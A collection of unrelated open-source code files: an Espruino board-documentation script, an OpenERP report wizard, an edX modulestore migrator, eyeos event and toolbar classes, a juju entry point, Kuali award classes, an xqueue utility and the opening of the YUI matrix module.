  if "CAN" in functionsOnBoard: writeHTML("""  <li><span class="pinfunction CAN">CAN</span> is for the <a href="http://en.wikipedia.org/wiki/CAN_bus">Controller Area Network</a>. It is not supported by Espruino.</li>""")
  writeHTML("  </ul>");
# Emit the board itself: one absolutely-positioned DIV per pin strip, each pin
# rendered by dump_pin(). Pins that do not appear on any strip are collected
# afterwards into a separate "Pins not on connectors" section.
writeHTML('  <DIV id="boardcontainer">')
writeHTML('  <DIV id="board">')
usedpins = []
for pinstrip in board.board:
  if pinstrip[0]!='_':
    writeHTML('   <DIV id="'+pinstrip+'">')
    for pin in board.board[pinstrip]:
      usedpins.append(pin)
      dump_pin(pin, pinstrip)
    writeHTML('   </DIV>')
otherpins = 0
for pinstruct in pins:
  pin = pinstruct["name"]
  if pin not in usedpins:
    otherpins = otherpins + 1
# Fix: HTML end tags must not carry attributes ('</DIV id="board">' is
# invalid markup); keep the labels as comments instead.
writeHTML('  </DIV><!-- board -->')
writeHTML('  </DIV><!-- boardcontainer -->')
if otherpins>0:
  writeHTML('  <DIV id="otherpins">')
  writeHTML('   <H2>Pins not on connectors</H2>')
  for pinstruct in pins:
    pin = pinstruct["name"]
    if pin not in usedpins:
      dump_pin(pin, "otherpins")
  writeHTML('  </DIV>')
writeHTML('  <P></P>')
#writeHTML('<SCRIPT type="text/javascript"> $(function() {');
#writeHTML('var x = $("#board").offset().left+500;');
#writeHTML('var y = $("#board").offset().top+200;');
#d = 12
#writeHTML('drawLine(x+'+str(-5*d)+',y+'+str(-5*d)+',x+'+str(5*d)+',y+'+str(-5*d)+');');
#writeHTML('drawLine(x+'+str(5*d)+',y+'+str(-5*d)+',x+'+str(5*d)+',y+'+str(5*d)+');');
#writeHTML('drawLine(x+'+str(5*d)+',y+'+str(5*d)+',x+'+str(-5*d)+',y+'+str(5*d)+');');
#writeHTML('drawLine(x+'+str(-5*d)+',y+'+str(5*d)+',x+'+str(-5*d)+',y+'+str(-5*d)+');');
#writeHTML('var p;');
#for pinstrip in board.board:
# if pinstrip[0]!='_':
# for pin in board.board[pinstrip]:
# if pin in pinmap:
# pin = pinmap[pin];
# pininfo = pinutils.findpin(pins, pin, False)
# if "UQFN48" in pininfo["csv"]:
# n = int(pininfo["csv"]["UQFN48"])-1
# n = (n+12) % 48
# if n<12:
# px = (n-6)*d
# py = -6*d
# elif n<24:
# px = 6*d
# py = ((n-12)-6)*d
# elif n<36:
# px = (6-(n-24))*d
# py = 6*d
# else:
# px = -6*d
# py = (6-(n-36))*d
#
# writeHTML("p=$('.pinname:contains(\""+pin+".\")');");
# pinx = "p.offset().left+p.width()/2";
# piny = "p.offset().top+p.height()/2";
# writeHTML('drawLine(x+'+str(px)+',y+'+str(py)+','+pinx+','+piny+', "'+pin+'");');
#writeHTML('});</SCRIPT>');
# Close the BODY/HTML wrapper that was opened for standalone pages.
if not embeddable:
  writeHTML("  </BODY>")
  writeHTML("</HTML>")
| koltegirish/Espruino | scripts/build_board_docs.py | Python | mpl-2.0 | 14,959 |
##############################################################################
#
# Copyright (c) 2008-2011 Alistek Ltd (http://www.alistek.com) All Rights Reserved.
# General contacts <info@alistek.com>
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This module is GPLv3 or newer and incompatible
# with OpenERP SA "AGPL + Private Use License"!
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import wizard
import pooler
from tools.translate import _
def ir_del(cr, uid, id):
    """Remove the ``ir.values`` record with the given database id."""
    values_obj = pooler.get_pool(cr.dbname).get('ir.values')
    return values_obj.unlink(cr, uid, [id])
class report_actions_remove_wizard(wizard.interface):
    '''
    Remove print button

    Old-style OpenERP wizard that removes the artefact exposing an Aeroo
    report's print button: the ir.values binding for classic reports, or the
    ir.actions.act_window record for wizard-style reports.
    '''
    # Confirmation form shown when a print button exists for the report.
    form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="Or you want to remove print button for this report?"/>
</form>'''

    # Shown when there is nothing to remove.
    ex_form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="No Report Action to delete for this report"/>
</form>'''

    # Shown once removal has succeeded.
    done_form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="The print button is successfully removed"/>
</form>'''

    def _do_action(self, cr, uid, data, context):
        # Delete whichever artefact exposes the print button for this report.
        pool = pooler.get_pool(cr.dbname)
        report = pool.get(data['model']).read(cr, uid, data['id'], ['report_wizard'], context=context)
        if report['report_wizard']:
            # Wizard-style report: _check stored the window-action id for us.
            pool.get('ir.actions.act_window').unlink(cr, uid, data['report_action_id'], context=context)
        else:
            # Classic report: delete the ir.values entry that binds the report
            # to its model.
            event_id = pool.get('ir.values').search(cr, uid, [('value','=','ir.actions.report.xml,%d' % data['id'])])[0]
            res = ir_del(cr, uid, event_id)
        return {}

    def _check(self, cr, uid, data, context):
        # Pick the next wizard state: 'remove' when a print-button artefact
        # exists for this report, 'no_exist' otherwise.
        pool = pooler.get_pool(cr.dbname)
        report = pool.get(data['model']).browse(cr, uid, data['id'], context=context)
        if report.report_wizard:
            act_win_obj = pool.get('ir.actions.act_window')
            act_win_ids = act_win_obj.search(cr, uid, [('res_model','=','aeroo.print_actions')], context=context)
            for act_win in act_win_obj.browse(cr, uid, act_win_ids, context=context):
                # NOTE(review): the stored context string is evaluated with
                # bare eval(); presumably it is always server-written and
                # trusted - verify before accepting user-supplied contexts.
                act_win_context = eval(act_win.context, {})
                if act_win_context.get('report_action_id')==report.id:
                    # Remember which window action _do_action should unlink.
                    data['report_action_id'] = act_win.id
                    return 'remove'
            return 'no_exist'
        else:
            ids = pool.get('ir.values').search(cr, uid, [('value','=',report.type+','+str(data['id']))])
            if not ids:
                return 'no_exist'
            else:
                return 'remove'

    # Wizard state machine: init -> (remove | no_exist) -> process -> done -> exit
    states = {
        'init': {
            'actions': [],
            'result': {'type':'choice','next_state':_check}
        },
        'remove': {
            'actions': [],
            'result': {'type': 'form', 'arch': form, 'fields': {}, 'state': (('end', _('_No')), ('process', _('_Yes')))},
        },
        'no_exist': {
            'actions': [],
            'result': {'type': 'form', 'arch': ex_form, 'fields': {}, 'state': (('end', _('_Close')),)},
        },
        'process': {
            'actions': [_do_action],
            'result': {'type': 'state', 'state': 'done'},
        },
        'done': {
            'actions': [],
            'result': {'type': 'form', 'arch': done_form, 'fields': {}, 'state': (('exit', _('_Close')),)},
        },
        'exit': {
            'actions': [],
            'result': {'type': 'state', 'state': 'end'},
        },
    }
# Register the wizard under its OpenERP service name.
report_actions_remove_wizard('aeroo.report_actions_remove')
| kailIII/emaresa | trunk.pe/report_aeroo/wizard/report_actions_remove.py | Python | agpl-3.0 | 4,658 |
'''
Code for migrating from other modulestores to the split_mongo modulestore.
Exists at the top level of modulestore b/c it needs to know about and access each modulestore.
In general, it's strategy is to treat the other modulestores as read-only and to never directly
manipulate storage but use existing api's.
'''
import logging
from opaque_keys.edx.locator import CourseLocator
from xblock.fields import Reference, ReferenceList, ReferenceValueDict
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.exceptions import ItemNotFoundError
log = logging.getLogger(__name__)
class SplitMigrator:
    """
    Copies courses from old mongo to split mongo and sets up location mapping so any references to the old
    name will be able to find the new elements.
    """
    def __init__(self, split_modulestore, source_modulestore):
        # split_modulestore: destination (split mongo) store, written to.
        # source_modulestore: origin store, treated as read-only.
        super().__init__()
        self.split_modulestore = split_modulestore
        self.source_modulestore = source_modulestore

    def migrate_mongo_course(
            self, source_course_key, user_id, new_org=None, new_course=None, new_run=None, fields=None, **kwargs
    ):
        """
        Create a new course in split_mongo representing the published and draft versions of the course from the
        original mongo store. And return the new CourseLocator

        If the new course already exists, this raises DuplicateItemError

        :param source_course_key: which course to migrate
        :param user_id: the user whose action is causing this migration
        :param new_org, new_course, new_run: (optional) identifiers for the new course. Defaults to
            the source_course_key's values.
        :param fields: (optional) overrides merged on top of the translated course fields.
        """
        # the only difference in data between the old and split_mongo xblocks are the locations;
        # so, any field which holds a location must change to a Locator; otherwise, the persistence
        # layer and kvs's know how to store it.
        # locations are in location, children, conditionals, course.tab

        # create the course: set fields to explicitly_set for each scope, id_root = new_course_locator, master_branch = 'production'  # lint-amnesty, pylint: disable=line-too-long
        original_course = self.source_modulestore.get_course(source_course_key, **kwargs)
        if original_course is None:
            raise ItemNotFoundError(str(source_course_key))

        # Fall back to the source identifiers for any part not overridden.
        if new_org is None:
            new_org = source_course_key.org
        if new_course is None:
            new_course = source_course_key.course
        if new_run is None:
            new_run = source_course_key.run

        new_course_key = CourseLocator(new_org, new_course, new_run, branch=ModuleStoreEnum.BranchName.published)
        with self.split_modulestore.bulk_operations(new_course_key):
            new_fields = self._get_fields_translate_references(original_course, new_course_key, None)
            if fields:
                new_fields.update(fields)
            new_course = self.split_modulestore.create_course(
                new_org, new_course, new_run, user_id,
                fields=new_fields,
                master_branch=ModuleStoreEnum.BranchName.published,
                skip_auto_publish=True,
                **kwargs
            )

            self._copy_published_modules_to_course(
                new_course, original_course.location, source_course_key, user_id, **kwargs
            )
        # TODO: This should be merged back into the above transaction, but can't be until split.py
        # is refactored to have more coherent access patterns
        with self.split_modulestore.bulk_operations(new_course_key):
            # create a new version for the drafts
            self._add_draft_modules_to_course(new_course.location, source_course_key, user_id, **kwargs)

        return new_course.id

    def _copy_published_modules_to_course(self, new_course, old_course_loc, source_course_key, user_id, **kwargs):
        """
        Copy all of the modules from the 'direct' version of the course to the new split course.
        """
        course_version_locator = new_course.id.version_agnostic()

        # iterate over published course elements. Wildcarding rather than descending b/c some elements are orphaned (e.g.,  # lint-amnesty, pylint: disable=line-too-long
        # course about pages, conditionals)
        for module in self.source_modulestore.get_items(
                source_course_key, revision=ModuleStoreEnum.RevisionOption.published_only, **kwargs
        ):
            # don't copy the course again.
            if module.location != old_course_loc:
                # create split_xblock using split.create_item
                # NOTE: the below auto populates the children when it migrates the parent; so,
                # it doesn't need the parent as the first arg. That is, it translates and populates
                # the 'children' field as it goes.
                _new_module = self.split_modulestore.create_item(
                    user_id,
                    course_version_locator,
                    module.location.block_type,
                    block_id=module.location.block_id,
                    fields=self._get_fields_translate_references(
                        module, course_version_locator, new_course.location.block_id
                    ),
                    skip_auto_publish=True,
                    **kwargs
                )
        # after done w/ published items, add version for DRAFT pointing to the published structure
        index_info = self.split_modulestore.get_course_index_info(course_version_locator)
        versions = index_info['versions']
        versions[ModuleStoreEnum.BranchName.draft] = versions[ModuleStoreEnum.BranchName.published]
        self.split_modulestore.update_course_index(course_version_locator, index_info)

        # clean up orphans in published version: in old mongo, parents pointed to the union of their published and draft
        # children which meant some pointers were to non-existent locations in 'direct'
        self.split_modulestore.fix_not_found(course_version_locator, user_id)

    def _add_draft_modules_to_course(self, published_course_usage_key, source_course_key, user_id, **kwargs):
        """
        update each draft. Create any which don't exist in published and attach to their parents.
        """
        # each true update below will trigger a new version of the structure. We may want to just have one new version
        # but that's for a later date.
        new_draft_course_loc = published_course_usage_key.course_key.for_branch(ModuleStoreEnum.BranchName.draft)
        # to prevent race conditions of grandchilden being added before their parents and thus having no parent to
        # add to
        awaiting_adoption = {}
        for module in self.source_modulestore.get_items(
                source_course_key, revision=ModuleStoreEnum.RevisionOption.draft_only, **kwargs
        ):
            new_locator = new_draft_course_loc.make_usage_key(module.category, module.location.block_id)
            if self.split_modulestore.has_item(new_locator):
                # was in 'direct' so draft is a new version
                split_module = self.split_modulestore.get_item(new_locator, **kwargs)
                # need to remove any no-longer-explicitly-set values and add/update any now set values.
                for name, field in split_module.fields.items():
                    if field.is_set_on(split_module) and not module.fields[name].is_set_on(module):
                        field.delete_from(split_module)
                for field, value in self._get_fields_translate_references(
                        module, new_draft_course_loc, published_course_usage_key.block_id, field_names=False
                ).items():
                    field.write_to(split_module, value)

                _new_module = self.split_modulestore.update_item(split_module, user_id, **kwargs)
            else:
                # only a draft version (aka, 'private').
                _new_module = self.split_modulestore.create_item(
                    user_id, new_draft_course_loc,
                    new_locator.block_type,
                    block_id=new_locator.block_id,
                    fields=self._get_fields_translate_references(
                        module, new_draft_course_loc, published_course_usage_key.block_id
                    ),
                    **kwargs
                )
                awaiting_adoption[module.location] = new_locator
        # Second pass: attach every newly-created draft-only block to its
        # parent, preserving the child's position among its siblings.
        for draft_location, new_locator in awaiting_adoption.items():
            parent_loc = self.source_modulestore.get_parent_location(
                draft_location, revision=ModuleStoreEnum.RevisionOption.draft_preferred, **kwargs
            )
            if parent_loc is None:
                log.warning('No parent found in source course for %s', draft_location)
                continue
            old_parent = self.source_modulestore.get_item(parent_loc, **kwargs)
            split_parent_loc = new_draft_course_loc.make_usage_key(
                parent_loc.block_type,
                parent_loc.block_id if parent_loc.block_type != 'course' else published_course_usage_key.block_id
            )
            new_parent = self.split_modulestore.get_item(split_parent_loc, **kwargs)
            # this only occurs if the parent was also awaiting adoption: skip this one, go to next
            if any(new_locator.block_id == child.block_id for child in new_parent.children):
                continue
            # find index for module: new_parent may be missing quite a few of old_parent's children
            new_parent_cursor = 0
            for old_child_loc in old_parent.children:
                if old_child_loc.block_id == draft_location.block_id:
                    break  # moved cursor enough, insert it here
                # sibling may move cursor
                for idx in range(new_parent_cursor, len(new_parent.children)):
                    if new_parent.children[idx].block_id == old_child_loc.block_id:
                        new_parent_cursor = idx + 1
                        break  # skipped sibs enough, pick back up scan
            new_parent.children.insert(new_parent_cursor, new_locator)
            new_parent = self.split_modulestore.update_item(new_parent, user_id)

    def _get_fields_translate_references(self, xblock, new_course_key, course_block_id, field_names=True):
        """
        Return a dictionary of field: value pairs for explicitly set fields
        but convert all references to their BlockUsageLocators

        Args:
            field_names: if Truthy, the dictionary keys are the field names. If falsey, the keys are the
                field objects.
        """
        def get_translation(location):
            """
            Convert the location
            """
            return new_course_key.make_usage_key(
                location.block_type,
                location.block_id if location.block_type != 'course' else course_block_id
            )

        result = {}
        for field_name, field in xblock.fields.items():
            if field.is_set_on(xblock):
                field_value = field.read_from(xblock)
                field_key = field_name if field_names else field
                # Translate single references, lists, and dicts of references;
                # all other field values pass through unchanged.
                if isinstance(field, Reference) and field_value is not None:
                    result[field_key] = get_translation(field_value)
                elif isinstance(field, ReferenceList):
                    result[field_key] = [
                        get_translation(ele) for ele in field_value
                    ]
                elif isinstance(field, ReferenceValueDict):
                    result[field_key] = {
                        key: get_translation(subvalue)
                        for key, subvalue in field_value.items()
                    }
                else:
                    result[field_key] = field_value
        return result
| eduNEXT/edx-platform | common/lib/xmodule/xmodule/modulestore/split_migrator.py | Python | agpl-3.0 | 11,976 |
<?php
/*
* eyeos - The Open Source Cloud's Web Desktop
* Version 2.0
* Copyright (C) 2007 - 2010 eyeos Team
*
* This program is free software; you can redistribute it and/or modify it under
* the terms of the GNU Affero General Public License version 3 as published by the
* Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
* details.
*
* You should have received a copy of the GNU Affero General Public License
* version 3 along with this program in the file "LICENSE". If not, see
* <http://www.gnu.org/licenses/agpl-3.0.txt>.
*
* See www.eyeos.org for more details. All requests should be sent to licensing@eyeos.org
*
* The interactive user interfaces in modified source and object code versions
* of this program must display Appropriate Legal Notices, as required under
* Section 5 of the GNU Affero General Public License version 3.
*
* In accordance with Section 7(b) of the GNU Affero General Public License version 3,
* these Appropriate Legal Notices must retain the display of the "Powered by
* eyeos" logo and retain the original copyright notice. If the display of the
* logo is not reasonably feasible for technical reasons, the Appropriate Legal Notices
* must display the words "Powered by eyeos" and retain the original copyright notice.
*/
/**
* Users is invited
*
* Properties to set: $event: array (
* 'type' => "Groups_InvitedUsersSender"
* 'eventData' => array (
* usersId: array of userIds or just a string with an userId
* groupId: String the id of the group
* )
* )
*/
class InvitedUsersSenderEvent implements ISimpleEventHandler {
	/**
	 * Fill the properties of the event
	 *
	 * @param <AbstractEventNotification> $event
	 */
	public function autoFill (AbstractEventNotification $event) {
		if ($event->getEventData() === null) {
			throw new EyeInvalidArgumentException('You must specify the eventData property');
		}
		$eventData = $event->getEventData();
		// "usersId" may be a single user id (string/int) or an array of ids, as
		// documented in the class header. Fix: arrays were previously rejected
		// here, which made the multi-user branch below unreachable.
		if (!isset($eventData['usersId']) || (!is_string($eventData['usersId']) && !is_int($eventData['usersId']) && !is_array($eventData['usersId']))) {
			throw new EyeInvalidArgumentException('Missing or invalid $eventData[\'usersId\']');
		}
		if (!isset($eventData['groupId']) || !is_string($eventData['groupId'])) {
			throw new EyeInvalidArgumentException('Missing or invalid $eventData[\'groupId\']');
		}
		$userIds = $eventData['usersId'];
		$wGroupId = $eventData['groupId'];
		$wGroupName = GroupsEventHandler::retrieveWorkgroupName($wGroupId);
		if (!is_array($userIds)) {
			// Single invited user.
			$username = GroupsEventHandler::retrieveContactName($userIds);
			$event->setMessageInformation(array('User %s was invited in %s group.', array($username, $wGroupName)));
		} else {
			// Several invited users: join their names into one message.
			$usernames = array();
			foreach ($userIds as $userId) {
				$usernames[] = GroupsEventHandler::retrieveContactName($userId);
			}
			$usernamesString = implode(', ', $usernames);
			$event->setMessageInformation(array('Users %s were invited in %s group', array($usernamesString, $wGroupName)));
		}
		$event->setIsQuestion(false);
	}
}
?>
| DavidGarciaCat/eyeos | eyeos/system/Frameworks/Events/Handlers/Groups/InvitedUsersSenderEvent.php | PHP | agpl-3.0 | 3,272 |
// Copyright 2014 Canonical Ltd.
// Copyright 2014 Cloudbase Solutions
// Licensed under the AGPLv3, see LICENCE file for details.
// +build !windows
package main
import (
"os"
"github.com/juju/juju/juju/osenv"
"github.com/juju/utils/featureflag"
)
// init seeds the process-wide feature-flag registry from the juju
// feature-flag environment variable before main runs.
func init() {
	featureflag.SetFlagsFromEnvironment(osenv.JujuFeatureFlagEnvKey)
}
// main is the jujud entry point on non-Windows platforms; all real work is
// delegated to MainWrapper.
func main() {
	MainWrapper(os.Args)
}
| tsakas/juju | cmd/jujud/main_nix.go | GO | agpl-3.0 | 378 |
/*
* Kuali Coeus, a comprehensive research administration system for higher education.
*
* Copyright 2005-2015 Kuali, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.kuali.coeus.propdev.impl.abstrct;
import org.apache.commons.beanutils.PropertyUtils;
import org.apache.commons.lang3.StringUtils;
import org.kuali.coeus.propdev.impl.core.ProposalDevelopmentDocument;
import org.kuali.coeus.propdev.impl.core.ProposalDevelopmentDocumentForm;
import org.kuali.coeus.sys.framework.service.KcServiceLocator;
import org.kuali.rice.core.api.util.ConcreteKeyValue;
import org.kuali.rice.core.api.util.KeyValue;
import org.kuali.rice.krad.data.DataObjectService;
import org.kuali.rice.krad.uif.control.UifKeyValuesFinderBase;
import org.kuali.rice.krad.uif.field.InputField;
import org.kuali.rice.krad.uif.view.ViewModel;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.stereotype.Component;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
/**
 * Builds the selectable set of {@link AbstractType} options for a proposal
 * abstract. Types for which the document already has an abstract are hidden,
 * except for the type currently selected in the field, so that an existing
 * row keeps its own value visible. See <code>getKeyValues()</code>.
 *
 * @author Kuali Research Administration Team (kualidev@oncourse.iu.edu)
 */
@Component("abstractTypeValuesFinder")
public class AbstractTypeValuesFinder extends UifKeyValuesFinderBase {

    @Autowired
    @Qualifier("dataObjectService")
    private DataObjectService dataObjectService;

    @Override
    public List<KeyValue> getKeyValues(ViewModel model, InputField field) {
        ProposalDevelopmentDocumentForm proposalForm = (ProposalDevelopmentDocumentForm) model;
        String currentSelection = getFieldValue(model, field);

        // Start with the blank "select" placeholder entry.
        List<KeyValue> options = new ArrayList<KeyValue>();
        options.add(new ConcreteKeyValue("", "select"));

        Collection<AbstractType> allTypes = getDataObjectService().findAll(AbstractType.class).getResults();
        for (AbstractType candidate : allTypes) {
            boolean alreadyUsed = hasAbstract(proposalForm.getProposalDevelopmentDocument(), candidate);
            boolean isCurrentSelection = StringUtils.equals(candidate.getCode(), currentSelection);
            if (!alreadyUsed || isCurrentSelection) {
                options.add(new ConcreteKeyValue(candidate.getCode(), candidate.getDescription()));
            }
        }
        return options;
    }

    /**
     * Returns true when the document already contains a proposal abstract of
     * the given type.
     */
    private boolean hasAbstract(ProposalDevelopmentDocument doc, AbstractType abstractType) {
        if (doc == null) {
            return false;
        }
        for (ProposalAbstract proposalAbstract : doc.getDevelopmentProposal().getProposalAbstracts()) {
            if (proposalAbstract.getAbstractTypeCode().equals(abstractType.getCode())) {
                return true;
            }
        }
        return false;
    }

    /**
     * Reads the abstract type code currently bound to the field; returns the
     * empty string for "new line" bindings, which have no value yet.
     */
    private String getFieldValue(ViewModel model, InputField field) {
        String bindingPath = field.getBindingInfo().getBindingPath();
        if (StringUtils.startsWith(bindingPath, "new")) {
            return StringUtils.EMPTY;
        }
        try {
            return (String) PropertyUtils.getNestedProperty(model, bindingPath);
        } catch (Exception e) {
            throw new RuntimeException("could not retrieve abstract type from the input field", e);
        }
    }

    public DataObjectService getDataObjectService() {
        // Lazily resolve the service when Spring injection did not occur.
        if (dataObjectService == null) {
            dataObjectService = KcServiceLocator.getService(DataObjectService.class);
        }
        return dataObjectService;
    }

    public void setDataObjectService(DataObjectService dataObjectService) {
        this.dataObjectService = dataObjectService;
    }
}
| sanjupolus/kc-coeus-1508.3 | coeus-impl/src/main/java/org/kuali/coeus/propdev/impl/abstrct/AbstractTypeValuesFinder.java | Java | agpl-3.0 | 4,358 |
/*
* eyeos - The Open Source Cloud's Web Desktop
* Version 2.0
* Copyright (C) 2007 - 2010 eyeos Team
*
* This program is free software; you can redistribute it and/or modify it under
* the terms of the GNU Affero General Public License version 3 as published by the
* Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
* details.
*
* You should have received a copy of the GNU Affero General Public License
* version 3 along with this program in the file "LICENSE". If not, see
* <http://www.gnu.org/licenses/agpl-3.0.txt>.
*
* See www.eyeos.org for more details. All requests should be sent to licensing@eyeos.org
*
* The interactive user interfaces in modified source and object code versions
* of this program must display Appropriate Legal Notices, as required under
* Section 5 of the GNU Affero General Public License version 3.
*
* In accordance with Section 7(b) of the GNU Affero General Public License version 3,
* these Appropriate Legal Notices must retain the display of the "Powered by
* eyeos" logo and retain the original copyright notice. If the display of the
* logo is not reasonably feasible for technical reasons, the Appropriate Legal Notices
* must display the words "Powered by eyeos" and retain the original copyright notice.
*/
/**
* eyeos.ui.toolbar.LabelHeader - Styling...
* Extending a eyeos.ui.toolbar.ImageHeader, to implement the eyeos
* look and feel behaviour.
* The two labels will be top-bottom aligned as default, but it can be changed
* using the {@see this#order}.
*/
qx.Class.define('eyeos.ui.toolbar.LabelHeader', {
    extend : eyeos.ui.toolbar.ImageHeader,

    /**
     * @param leftLabel {String} Text for the left button.
     * @param rightLabel {String} Text for the right button.
     */
    construct : function(leftLabel, rightLabel) {
        arguments.callee.base.call(this, null, null);
        this.setLeftLabel(leftLabel);
        this.setRightLabel(rightLabel);
        this._setEyeosStyle();
    },

    properties: {
        /**
         * the widget's left label.
         */
        leftLabel: {
            init: null
        },

        /**
         * the widget's right label.
         */
        rightLabel: {
            init: null
        }
    },

    members: {
        /**
         * Apply the eyeos look and feel: replace the default children with a
         * left/right button pair and switch the container layout whenever the
         * `order` property changes.
         */
        _setEyeosStyle: function() {
            this.getChildrenContainer().setLayout(new qx.ui.layout.VBox());
            this.setDecorator(null);
            this.removeAll();

            var leftButton = new qx.ui.toolbar.Button(tr(this.getLeftLabel()));
            leftButton.addListener('execute', function() {
                this.setMode(false);
            }, this);
            this.add(leftButton);

            var rightButton = new qx.ui.toolbar.Button(tr(this.getRightLabel()));
            rightButton.addListener('execute', function() {
                this.setMode(true);
            }, this);
            this.add(rightButton);

            this.addListener('changeOrder', function() {
                switch (this.getOrder()) {
                    case 'left-right':
                        this.getChildrenContainer().setLayout(new qx.ui.layout.HBox());
                        // BUG FIX: the original had no break here, so this case
                        // fell through into 'top-bottom' and the HBox layout was
                        // immediately overwritten with a VBox.
                        break;
                    case 'top-bottom':
                        this.getChildrenContainer().setLayout(new qx.ui.layout.VBox());
                        break;
                }
            }, this);
        }
    }
});
/*
* Kuali Coeus, a comprehensive research administration system for higher education.
*
* Copyright 2005-2015 Kuali, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.kuali.kra.award.home;
import org.kuali.coeus.common.framework.rolodex.Rolodex;
import org.kuali.coeus.sys.framework.model.KcPersistableBusinessObjectBase;
/**
 * Template-level award contact: links a {@link Rolodex} (address book) entry
 * and a contact role/type to an {@link AwardTemplate}.
 */
public class AwardTemplateContact extends KcPersistableBusinessObjectBase {

    private static final long serialVersionUID = 5168275576240665727L;

    // Primary key.
    private Integer templateContactId;

    // Owning template (parent of this contact row).
    private AwardTemplate awardTemplate;

    // Code identifying the contact's role on the award template.
    private String roleCode;

    // Foreign key to the rolodex entry for this contact.
    private Integer rolodexId;

    private ContactType contactType;

    private Rolodex rolodex;

    public AwardTemplateContact() {
    }

    public Integer getTemplateContactId() {
        return templateContactId;
    }

    public void setTemplateContactId(Integer templateContactId) {
        this.templateContactId = templateContactId;
    }

    public AwardTemplate getAwardTemplate() {
        return awardTemplate;
    }

    public void setAwardTemplate(AwardTemplate awardTemplate) {
        this.awardTemplate = awardTemplate;
    }

    /**
     * Gets the roleCode attribute.
     * @return Returns the roleCode.
     */
    public String getRoleCode() {
        return roleCode;
    }

    /**
     * Sets the roleCode attribute value.
     * @param contactTypeCode The role code to set.
     */
    public void setRoleCode(String contactTypeCode) {
        this.roleCode = contactTypeCode;
    }

    /**
     * Gets the rolodexId attribute.
     * @return Returns the rolodexId.
     */
    public Integer getRolodexId() {
        return rolodexId;
    }

    /**
     * Sets the rolodexId attribute value.
     * @param rolodexId The rolodexId to set.
     */
    public void setRolodexId(Integer rolodexId) {
        this.rolodexId = rolodexId;
    }

    /**
     * Gets the contactType attribute.
     * @return Returns the contactType.
     */
    public ContactType getContactType() {
        return contactType;
    }

    /**
     * Sets the contactType attribute value.
     * @param contactType The contactType to set.
     */
    public void setContactType(ContactType contactType) {
        this.contactType = contactType;
    }

    /**
     * Gets the rolodex attribute.
     * @return Returns the rolodex.
     */
    public Rolodex getRolodex() {
        return rolodex;
    }

    /**
     * Sets the rolodex attribute value.
     * @param rolodex The rolodex to set.
     */
    public void setRolodex(Rolodex rolodex) {
        this.rolodex = rolodex;
    }
}
| sanjupolus/KC6.oLatest | coeus-impl/src/main/java/org/kuali/kra/award/home/AwardTemplateContact.java | Java | agpl-3.0 | 3,267 |
import hashlib
def make_hashkey(seed):
    '''
    Generate a hashkey (string): the hex MD5 digest of str(seed).

    ``seed`` may be any object; it is converted with ``str()`` first.
    '''
    h = hashlib.md5()
    # str() returns unicode text on Python 3 and hashlib requires bytes, so
    # encode explicitly. The original ``h.update(str(seed))`` raises
    # TypeError on Python 3.
    h.update(str(seed).encode('utf-8'))
    return h.hexdigest()
def get_request_ip(request):
    '''
    Retrieve the IP origin of a Django request.

    Prefers the X-Real-IP header set by an nginx reverse proxy; otherwise
    falls back to the socket-level REMOTE_ADDR (or the string 'None' when
    that key is also absent).
    '''
    meta = request.META
    proxied_ip = meta.get('HTTP_X_REAL_IP', '')  # nginx reverse proxy
    if proxied_ip:
        return proxied_ip
    return meta.get('REMOTE_ADDR', 'None')
| GbalsaC/bitnamiP | xqueue/queue/util.py | Python | agpl-3.0 | 402 |
/*
YUI 3.11.0 (build d549e5c)
Copyright 2013 Yahoo! Inc. All rights reserved.
Licensed under the BSD License.
http://yuilibrary.com/license/
*/
YUI.add('matrix', function (Y, NAME) {
/**
* Matrix utilities.
*
* @class MatrixUtil
* @module matrix
**/
var MatrixUtil = {
/**
* Used as value for the _rounding method.
*
* @property _rounder
* @private
*/
_rounder: 100000,
/**
* Rounds values
*
* @method _round
* @private
*/
_round: function(val) {
val = Math.round(val * MatrixUtil._rounder) / MatrixUtil._rounder;
return val;
},
/**
* Converts a radian value to a degree.
*
* @method rad2deg
* @param {Number} rad Radian value to be converted.
* @return Number
*/
rad2deg: function(rad) {
